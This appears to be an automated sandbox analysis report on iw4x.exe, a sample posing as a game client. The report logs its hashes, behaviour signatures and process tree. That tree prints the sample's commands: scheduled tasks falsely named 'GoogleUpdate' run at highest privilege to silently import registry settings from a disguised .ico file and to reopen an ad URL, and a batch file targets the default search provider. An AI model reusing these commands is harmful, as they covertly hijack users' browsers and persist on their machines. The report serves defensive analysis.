Overview

overview

7

Static

static

3

iw4x.exe

windows7-x64

7

iw4x.exe

windows10-2004-x64

7

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

$TEMP/tidy.bat

windows7-x64

1

$TEMP/tidy.bat

windows10-2004-x64

1

$_4_/iw4x.exe

windows7-x64

1

$_4_/iw4x.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    103s
  • max time network
    93s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/06/2024, 17:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    iw4x.exe

  • Size

    2.0MB

  • MD5

    c56b3749e634f947687fbc2431d7dacc

  • SHA1

    2bb5934ae11cd6033adadd23844eb179762dc2f5

  • SHA256

    1d2c6dc364d6e2cfb42c03d8731119499a8914c28c41e83db9de568ed35c1787

  • SHA512

    32b8ca3c9a4b277a9656d071d7f750e961ea39c9349bb45e80ecf55f3ae0c01393edeee9b77f44184e7c83a87e8cca3dbf1060c2c0164fc98a7d8be5f4f2d2ce

  • SSDEEP

    49152:s8Wh7ey2CXEkqykl1EEXz8knkYcFDZX5TkMMKCAQMx0LioYbLQNP:sVhsCU/lGEXzZcFtJTpM3AdwioYk

Score
7/10
execution

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\iw4x.exe
    "C:\Users\Admin\AppData\Local\Temp\iw4x.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe
      "C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe" C:\Users\Admin\AppData\Local\Temp
      2⤵
      • Checks computer location settings
      • Deletes itself
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Users\Admin\AppData\Local\Temp\iw4x.exe
        "C:\Users\Admin\AppData\Local\Temp\iw4x.exe"
        3⤵
        • Executes dropped EXE
        PID:4456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tidy.bat" "C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe" "DefaultSearchProvider" "HKEY_LOCAL_MACHINE\SOFTWARE\\" "GPR" "CJ_2024-06" "x4w-3,99" "Windows Registry Editor" "{9948E670-2679-4580-953E-995422B950C4}""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pop-broker.com/?FORM=nwlcjstart&subid=GPR&bucket=x4w-3,99&q=&cid={9948E670-2679-4580-953E-995422B950C4}
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4340
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x70,0x128,0x7ffb1b6546f8,0x7ffb1b654708,0x7ffb1b654718
            5⤵
              PID:3164
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
              5⤵
                PID:5080
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2276
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
                5⤵
                  PID:864
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                  5⤵
                    PID:452
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                    5⤵
                      PID:3148
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
                      5⤵
                        PID:1804
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                        5⤵
                          PID:1628
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4532
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                          5⤵
                            PID:4888
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                            5⤵
                              PID:3892
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                              5⤵
                                PID:4864
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
                                5⤵
                                  PID:1492
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(10).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3964
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(10).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2676
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -Command "$input = '6/25/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
                                4⤵
                                  PID:1392
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "$input = '6/25/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2972
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -Command "$s = '6/25/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
                                  4⤵
                                    PID:1140
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "$s = '6/25/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1536
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /tn "GoogleUpdateWeekly" /sc daily /sd 06/25/2024 /st 00:00 /ri 60 /du 24:00 /rl highest /f /tr "regedit.exe /s \"C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico\" "
                                    4⤵
                                    • Creates scheduled task(s)
                                    PID:3108
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(29).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
                                    4⤵
                                      PID:3380
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(29).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4164
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -Command "$input = '7/14/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
                                      4⤵
                                        PID:4576
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "$input = '7/14/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3424
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c powershell -Command "$s = '7/14/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
                                        4⤵
                                          PID:2572
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command "$s = '7/14/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2212
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /tn "GoogleUpdateDaily" /sc daily /mo 1 /sd 07/14/2024 /st 00:00 /ri 360 /du 24:00 /rl highest /f /tr "cmd /c start "https://www.pop-broker.com/?FORM=nwlcjpop^&subid=GPR^&bucket=CJ_2024-06^&q=x4w-3,99^&cid={9948E670-2679-4580-953E-995422B950C4}" "
                                          4⤵
                                          • Creates scheduled task(s)
                                          PID:4420
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "(Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico').Replace('{HKS}', '"HKEY_LOCAL_MACHINE\SOFTWARE\\"').Replace('{DSP}', '"DefaultSearchProvider"').Replace('{subid}', '"GPR"').Replace('{bucket}', '"CJ_2024-06"').Replace('{WRE}', '"Windows Registry Editor"').Replace('{hash}', '"{9948E670-2679-4580-953E-995422B950C4}"') | Set-Content -Path 'C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico'"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4092
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:2336
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:716

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                        Filesize

                                        1KB

                                        MD5

                                        6195a91754effb4df74dbc72cdf4f7a6

                                        SHA1

                                        aba262f5726c6d77659fe0d3195e36a85046b427

                                        SHA256

                                        3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

                                        SHA512

                                        ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        3a09f853479af373691d131247040276

                                        SHA1

                                        1b6f098e04da87e9cf2d3284943ec2144f36ac04

                                        SHA256

                                        a358de2c0eba30c70a56022c44a3775aa99ffa819cd7f42f7c45ac358b5e739f

                                        SHA512

                                        341cf0f363621ee02525cd398ae0d462319c6a80e05fd25d9aca44234c42a3071b51991d4cf102ac9d89561a1567cbe76dfeaad786a304bec33821ca77080016

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        db9081c34e133c32d02f593df88f047a

                                        SHA1

                                        a0da007c14fd0591091924edc44bee90456700c6

                                        SHA256

                                        c9cd202ebb55fe8dd3e5563948bab458e947d7ba33bc0f38c6b37ce5d0bd7c3e

                                        SHA512

                                        12f9809958b024571891fae646208a76f3823ae333716a5cec303e15c38281db042b7acf95bc6523b6328ac9c8644794d39a0e03d9db196f156a6ee1fb4f2744

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
                                        Filesize

                                        203KB

                                        MD5

                                        99916ce0720ed460e59d3fbd24d55be2

                                        SHA1

                                        d6bb9106eb65e3b84bfe03d872c931fb27f5a3db

                                        SHA256

                                        07118bf4bbc3ba87d75cbc11ddf427219a14d518436d7f3886d75301f897edaf

                                        SHA512

                                        8d3d52e57806d1850b57bffee12c1a8d9e1a1edcf871b2395df5c889991a183a8d652a0636d5452068f5ef78d37e08ce10b2b2f4e05c3e3c0f2f2230310418a8

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                        Filesize

                                        120B

                                        MD5

                                        74f7958f5d87b5e6d5801dda21b42f78

                                        SHA1

                                        9153b1a7fdb8e1a2f022a8941c3546f64c62e3db

                                        SHA256

                                        ab0d75cd081b08c113e283cef26b0d79cb7356bfc75a01ce2494a06723576658

                                        SHA512

                                        a79d081d9c698da25a25f8d0c1e943f459c76ba33f3159ee2a8d73809bf4a14ccb2e3542d4c8025040bd185d0e19a08bd5b0acf0e919f5ea44eb54e75c5cdd51

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        6KB

                                        MD5

                                        5da279fe4061ce43e2ab683b79725c35

                                        SHA1

                                        8d2a146310eafaafd229064e62c780a4d30c555f

                                        SHA256

                                        74e7b4ee648075ef729b9c521df07a4df59415617f8a735e45ffeccc2f219127

                                        SHA512

                                        9c9d9bdf52555a9de16286be92a513256042c0629c7b5edb13e143cf194b1ff078e25fb8a642159cec6741b2fef783b94574b7016ec7c55b67c963611577a537

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        6KB

                                        MD5

                                        61c58d477ca07b04f22dc5e750ff5de5

                                        SHA1

                                        1a1895bace85cdfa1535a6ec341cab3d0c8172d7

                                        SHA256

                                        664629e9e7895d4e65151aa4255c0346f1be3f140ea025a0e16fbaf96781785a

                                        SHA512

                                        9f6ec3d7276e9f8d24ce818306e1550bedfaa25312ee3c281bcd3567e1701670420b9fa305f5886fb4985e3cb8d7887d2e96508f4735015f56f6e5a7ca093cb8

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                        Filesize

                                        16B

                                        MD5

                                        6752a1d65b201c13b62ea44016eb221f

                                        SHA1

                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                        SHA256

                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                        SHA512

                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        11KB

                                        MD5

                                        c5637e48fa1cfafb83934ecc66143a0d

                                        SHA1

                                        e43d41e61618f92471e0f74275c8eed8935eb572

                                        SHA256

                                        45d0116885171d09340b5fd322fd63967b18f6a6ebf342b07615a0da8b6a1813

                                        SHA512

                                        dcf66b8b7f91664fdf564698e32ee5cda58fb6bcf916a4b5f91bf91308291f895a38be625a3914704ddac277aafd8e89a5de5572d54b6aede3cadafe291f89ba

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        16KB

                                        MD5

                                        b7f1019c127d3abb2ed1d989acc43751

                                        SHA1

                                        de9a4f1222bff692edfdfc628d351d6cd84eb761

                                        SHA256

                                        277b2539a5add26a72cc75d011681533ca1336b23b99a1d5f25c65f2ec685cb7

                                        SHA512

                                        a28f0516dc548fd44c48c44626523a5e4284b6a9e426ad412e41b016bf66e8909fad375fe6cfed33671a3000cbd849272b2525e20fd306bbb661fae21fa3b437

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        12KB

                                        MD5

                                        a31b5a4523563ce46648337e31305089

                                        SHA1

                                        801efd6dd8cd128a7521d1d9240201bd3da6e33d

                                        SHA256

                                        5d34a0906a4aa7aaf0a5ba2e3e65a37df70d16787a45071f1f8f83b83e944b70

                                        SHA512

                                        1c491c16e5c321d0700dce24536a21e93814f7f6278761baa7a4dd90114f00de1dc9e7cddf0a265d166e736531b72b91c6e7a693ba5df4fc0b9aca2387df6b5a

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        13KB

                                        MD5

                                        4c54e03baa9ca25a015f21b9038a033a

                                        SHA1

                                        4790f469c4e0fb77ae28ab855f8f7a7881324f5d

                                        SHA256

                                        cc9a8f1eb5e888116be95ecf8a144c90d062fbb67b4424a607da294587742450

                                        SHA512

                                        67f0673bd7e5d3a8fcc1a99cc4ed3144fadd8e59fd3aec6e6553b5e0b7010d05ab898ff77691d82530b1476bf5a67aefefb87eb5813da08b4c433b28cf997bce

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        16KB

                                        MD5

                                        f585f0ad71c3d0ce18c2f142274730f6

                                        SHA1

                                        b0403ed51f6bf1c5eaa96f444f91a21472288c23

                                        SHA256

                                        22bf3b98416f044272981b19bc2e42aa3615c90d57008afb5436a935c35fae48

                                        SHA512

                                        fa7178d30130a8ae53b1ec072143b8c27abb0885144a8fcfb419bb1e48b790e0fd7f4968f26e690f7b2aad50f39aa1958672a4178732e7abe8eceff681d35003

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        12KB

                                        MD5

                                        728e1f40bb3b73464edff1d0af0d8185

                                        SHA1

                                        295ec2341671cb11ad0f831ede026382d2e80084

                                        SHA256

                                        a0e3f42b61f82e068bb9eddb409dbea6ce890579d8ac264a610b5c3daf6f21bb

                                        SHA512

                                        07fa57b3480f84a2c820aed2b8e29a73f9b988248e069efb976277e95f0c7c4eb57d52d6a2a1aba91e8486b607998d20849d6b4d39577e5ab5891ee5599830d7

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        13KB

                                        MD5

                                        388ab0062a48403d1be9d80db834af94

                                        SHA1

                                        1b23913323cdf40a77a0a8e9c4189fcf82d8b553

                                        SHA256

                                        ec7d152ec39b7985d6b753850d83cd45e7f3cb18423079d39038887f1e644ab6

                                        SHA512

                                        5ec718ed9abf264820db9ba863bb5c1a1ef6fbfe40c9d1798aea70af0d8fb9b9a5704a7299dadad82c8384a967708b2f09ab635ecbe35828164c681bdc3321da

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmkomjyi.mb4.ps1
                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\iw4x.exe
                                        Filesize

                                        4.0MB

                                        MD5

                                        5c42d7edad34b9a6fbc573699657f674

                                        SHA1

                                        d60025e895d661761204fa8ca9b347e625143ce1

                                        SHA256

                                        e8026dd43d348584034329610ca7691b7bef866142531382f1fb8155ea4f7269

                                        SHA512

                                        4e01e613e7b99fe0e18b4d7d04cc2ed221f4a0c3375da6fe1c9b1ae72aa2f419a721824b88cc3fc32bb05ff84bd3daf791eaeced5fafc363306f18e98ef3d9ae

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe
                                        Filesize

                                        2.0MB

                                        MD5

                                        c56b3749e634f947687fbc2431d7dacc

                                        SHA1

                                        2bb5934ae11cd6033adadd23844eb179762dc2f5

                                        SHA256

                                        1d2c6dc364d6e2cfb42c03d8731119499a8914c28c41e83db9de568ed35c1787

                                        SHA512

                                        32b8ca3c9a4b277a9656d071d7f750e961ea39c9349bb45e80ecf55f3ae0c01393edeee9b77f44184e7c83a87e8cca3dbf1060c2c0164fc98a7d8be5f4f2d2ce

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\nsr3C89.tmp\System.dll
                                        Filesize

                                        12KB

                                        MD5

                                        4add245d4ba34b04f213409bfe504c07

                                        SHA1

                                        ef756d6581d70e87d58cc4982e3f4d18e0ea5b09

                                        SHA256

                                        9111099efe9d5c9b391dc132b2faf0a3851a760d4106d5368e30ac744eb42706

                                        SHA512

                                        1bd260cabe5ea3cefbbc675162f30092ab157893510f45a1b571489e03ebb2903c55f64f89812754d3fe03c8f10012b8078d1261a7e73ac1f87c82f714bce03d

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico
                                        Filesize

                                        3KB

                                        MD5

                                        9b1f2ba66882fc6ade477add10e636f9

                                        SHA1

                                        8c7cc3c604ce7ec012f236e24e926b1c29095c52

                                        SHA256

                                        ca29f5e70948b08551f7ef9306eac77a86aa0f4cefc669b5a7fe1f79a4d5eec5

                                        SHA512

                                        1a757efee892643bf6b2d99dc48457f2b16a5ec849a9db9c01f2dcae4f686e021d1dc55529ea4ffab311318a14955913b334056807471c4436ba9d2d0749671f

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\tidy.bat
                                        Filesize

                                        5KB

                                        MD5

                                        0f87163cbdd0446b5324cce930be8c8b

                                        SHA1

                                        bbc7aa9471d7a89de11e1fcf83c6a7b654509293

                                        SHA256

                                        9a181f2597a6da871e10ea6d071726741634af68b2158edb649620c020d2bb0c

                                        SHA512

                                        727a3d9228121808871f8741bb0222ed29c7ab69b221b858efaf270a391266d6667b0897ee4aad3c446f38150f7bcb47ce3519c20878368909fe280f43825693

                                        Download Submit

                                      • memory/2676-48-0x0000000005F80000-0x0000000005FE6000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/2676-46-0x0000000005E30000-0x0000000005E52000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/2676-80-0x00000000076D0000-0x00000000076EA000-memory.dmp

                                        Filesize

                                        104KB

                                        Download

                                      • memory/2676-79-0x0000000007D80000-0x00000000083FA000-memory.dmp

                                        Filesize

                                        6.5MB

                                        Download

                                      • memory/2676-70-0x00000000065F0000-0x000000000663C000-memory.dmp

                                        Filesize

                                        304KB

                                        Download

                                      • memory/2676-69-0x00000000065C0000-0x00000000065DE000-memory.dmp

                                        Filesize

                                        120KB

